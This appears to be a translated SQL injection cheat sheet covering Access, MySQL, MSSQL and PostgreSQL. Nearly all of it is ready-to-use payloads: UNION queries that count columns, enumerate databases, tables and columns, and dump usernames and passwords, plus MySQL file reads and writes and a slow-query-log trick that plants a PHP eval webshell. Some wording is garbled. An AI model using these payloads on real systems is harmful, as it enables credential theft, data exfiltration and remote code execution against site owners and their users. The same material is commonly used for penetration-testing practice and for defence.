access mysql mssql postgresql familiar with the injection of four basic databases

0x00 Database Introduction

access: There is no user with the highest authority, and there is no system form. It is usually tested by brute force guessing. Access is independent, and one database corresponds to one website. MySQL databases can usually control multiple websites, and access can also use offset injection
mysql mssql postgresql: These three databases have the highest authority user, root sa mdb, etc. Mysql is divided into different 5.0 versions and there are different forms.

0x01 Basic statement of mysql mssql postgresql

mysql reads files: load_file()

union select 1,load_file('d:/1.txt'),3,4,5

mysql writes content to the file: into outfile

union select 1,‘shell’,3,4,5 into outfile ‘d:/1.txt’

To break through the write permission, please refer to the previous article, the breakthrough of secure_file_priv usually requires an executable page to execute the sql statement, usually with the help of the sql command line, phpmyadmin, etc.

set global slow_query_log=1;
set global slow_query_log_file='shell路径';
select '<?php eval($_GET[A])?>' or SLEEP(1);

mssql injection
- measure the number of columns:
order by 4
and 1=2 union all select null,null,null,null
- measure the position:
and 1=2 union all select null,1,null,null
and 1=2 union all select null,null,'s',null
- get information:
@@versionget version information
db_name()current database name
user、system_user,current_user,user_nameget current user name
@@SERVERNAMEget server host information
and 1=2 union all select null,db_name(),null,null
- get table name:

and 1=2  union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null
union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null

- get column names:

and 1=2  union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
and 1=2  union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null
and 1=2  union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null
and 1=2  union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null

-retrieve data:

and 1=2 union all select null,username, password ,null from manage

postgresql statement
- measure the number of columns:

order by 4

and 1=2 union select null,null,null,null

- Measuring position: 2nd, 3rd

and 1=2 union select 'null',null,null,null 错误
and 1=2 union select null,'null',null,null 正常
and 1=2 union select null,null,'null',null 正常
and 1=2 union select null,null,null,'null' 错误

-getting information:

and 1=2 UNION SELECT null,version(),null,null
and 1=2 UNION SELECT null,current_user,null,null
and 1=2 union select null,current_database(),null,null

- Get the database name:

and 1=2 union select null,string_agg(datname,','),null,null from pg_database

- get table name:

1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables

- get column names:

and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'

-retrieve data:

and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users

- Supplement - Get the dba user (also under the DBA user, it is possible to read and write files):

and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE

Msql poadtgresql usually uses null to replace the judgment field, mysql can use numbers